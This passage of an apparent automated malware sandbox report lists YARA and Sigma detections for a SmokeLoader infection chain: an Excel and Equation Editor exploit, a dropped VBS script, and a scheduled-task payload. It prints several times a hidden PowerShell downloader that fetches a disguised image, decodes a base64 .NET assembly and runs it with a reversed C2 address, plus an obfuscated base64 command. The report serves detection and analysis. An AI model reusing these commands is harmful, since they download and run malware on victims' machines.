13.2.RegAsm.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
12.2.powershell.exe.82d0000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 198.46.177.156, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3348, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3348, TargetFilename: C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs

Spreading

Sigma detected: Powershell download payload from hardcoded c2 list

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", Comm

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49171, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3348, Protocol: tcp, SourceIp: 198.46.177.156, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", Comm

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3420, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49172

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2772, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , ProcessId: 3420, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2772, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , ProcessId: 3420, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 54.241.153.192, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2772, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\rugtucw, CommandLine: C:\Users\user\AppData\Roaming\rugtucw, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\rugtucw, NewProcessName: C:\Users\user\AppData\Roaming\rugtucw, OriginalFileName: C:\Users\user\AppData\Roaming\rugtucw, ParentCommandLine: taskeng.exe {2B2AF159-87EA-4DB0-87E1-2E594ED3F3FE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1], ParentImage: C:\Windows\System32\taskeng.exe, ParentProcessId: 4004, ParentProcessName: taskeng.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\rugtucw, ProcessId: 4036, ProcessName: rugtucw

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3420, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49172

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2772, Protocol: tcp, SourceIp: 54.241.153.192, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", Comm

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }", Comm

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2772, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs" , ProcessId: 3420, ProcessName: wscript.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2772, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

